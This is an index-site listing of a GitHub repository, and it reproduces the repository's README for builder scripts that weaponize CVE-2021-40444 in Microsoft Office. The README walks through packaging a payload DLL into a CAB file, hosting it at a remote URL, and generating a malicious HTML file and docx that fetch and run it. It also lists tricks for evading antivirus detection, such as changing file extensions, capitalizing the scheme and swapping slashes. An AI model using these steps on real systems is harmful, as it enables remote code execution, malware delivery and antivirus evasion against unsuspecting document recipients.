Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/aslitsecurity/CVE-2021-40444_builders
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit
https://github.com/aslitsecurity/CVE-2021-40444_builders
Last synced: 22 days ago
JSON representation
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit
- Host: GitHub
- URL: https://github.com/aslitsecurity/CVE-2021-40444_builders
- Owner: aslitsecurity
- Created: 2021-09-12T18:05:53.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-10-11T20:53:19.000Z (about 3 years ago)
- Last Synced: 2024-08-05T17:44:41.654Z (4 months ago)
- Language: Python
- Size: 312 KB
- Stars: 171
- Watchers: 7
- Forks: 48
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - aslitsecurity/CVE-2021-40444_builders - This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit (Python)
README
CVE-2021-40444 builders
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit. This repo is just for testing, research and educational purposes. You are responsible for how you use the code provided in this repo.
The code is developed by reversing malware samples found in wild and shared by various security researchers.
The builders for this CVE are already public. The purpose of this repo is to check how effectively we can bypass static detections by different AV vendors for the docx files, at the time of writing.
The JS code can easily obfuscated by online tools or manually. But the docx file contains just one file which is document.xml.rels, on which the signatures can be based. What we can tamper in it so we can evade static detections of most of the AV.The cabrc.exe is Microsoft exe included in Internet Explorer Administration Kit and can be downloaded from https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads and after installation you would find this exe in "C:\Program Files (x86)\Windows IEAK 11"
There are 3 builders.
The code works for python 2.7
First go to CVE-2021-40444 folder and place your dll file there and rename it to IEcache.inf (or you can use the calc dll already there).
Then go to source folder and generate the cab file
c:\cve-2021-40444\sources\python generate_cab.py
Upload your cab file, and using the cab file URL generate the html file
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Note instead of using html extension, if we use .txt the exploit still works, but bypasses AV)
Now finally upload your html file and generate the doc file. Use HTTP (capital) instead of http, and "\" instead of "/", to bypass AV. And we dont need x-usc: too.
example: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\\192.168.1.12\new\tests.txt
The result is in front of you.
www.aslitsecurity.com
[email protected]